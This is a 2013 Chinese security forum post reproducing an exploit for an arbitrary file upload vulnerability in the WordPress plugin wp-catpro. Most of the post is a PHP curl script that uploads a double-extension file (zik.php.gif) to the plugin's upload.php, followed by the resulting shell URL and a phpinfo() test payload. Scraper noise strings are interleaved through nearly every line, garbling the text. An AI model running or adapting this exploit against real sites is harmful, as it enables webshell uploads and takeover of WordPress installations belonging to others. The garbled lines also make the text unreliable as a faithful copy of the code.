找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2632|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
: i' o7 v% N. ~- Q+ j7 y4 S#-----------------------------------------------------------------------  N$ |3 T  J; y* V( ~
4 B- k1 n; c! F0 i5 O" K& v/ e
作者  => Zikou-164 V; t5 V- c3 u: o. d, q$ g
邮箱 => zikou16x@gmail.com% x) |. b7 `9 o7 r* G# z$ ]
测试系统 : Windows 7 , Backtrack 5r3
+ ^& R# M: l5 P下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
& J4 t+ b9 B; w0 x2 L/ [" w####
$ |( |1 V& e6 M ; I) F& f6 G  C
#=> Exploit 信息:
3 O* ]2 O4 B8 `3 V------------------0 g9 s6 V7 s) x  [, I
# 攻击者可以上传 file/shell.php.gif
- U# I, O8 L$ {7 t# ("jpg", "gif", "png")  // Allowed file extensions
( G: g3 o/ G0 p: R% O# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)3 ]! c- q3 i* b; w- U
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)% I4 A( J( M) t, F1 i, _. _
------------------) ]6 o6 B$ u/ C3 \, v

+ V7 S# r, Y1 m" S#=> Exploit. F. n4 }( G8 q5 v% d* L
-----------
5 ^' @  F! a$ O" O8 t# D& {0 A# v<?php
- T% K. |6 a+ c% P+ Z
! Y; y# V5 p: C3 P7 C+ ]4 v$uploadfile="zik.php.gif";* D% T- L( y# Z: h4 W$ ?
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
. d2 S; u. {: b$ b$ n- ~curl_setopt($ch, CURLOPT_POST, true);
/ p# l5 K$ r2 _$ f0 s5 c% Jcurl_setopt($ch, CURLOPT_POSTFIELDS,: E! D2 x0 v$ N. y0 _8 I
array('Filedata'=>"@$uploadfile",! ~6 E5 @$ ^1 K' B& p) ?
'folder'=>'/wp-content/uploads/catpro/'));
4 M6 B+ z+ h' o2 Bcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- A, [) p( y, f1 a: I$postResult = curl_exec($ch);
, H" S. h+ E8 C+ ~* C5 rcurl_close($ch);
% A! l+ a2 R2 y5 d( r 0 s& z4 W7 u% w2 j" I3 t" G
print "$postResult";1 S, q8 Q& U; a8 M- I8 \4 l( y

$ M1 d3 X  O7 W9 M: t, P) n. LShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
+ |; {/ Q5 s8 X5 _) I( o  ?>
6 O& [& P' b( Y, z6 B1 Y<?php$ l9 g8 @: m" N! L7 [0 G) H
phpinfo();
1 Z# c8 f5 E2 F* |+ V/ x9 |?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表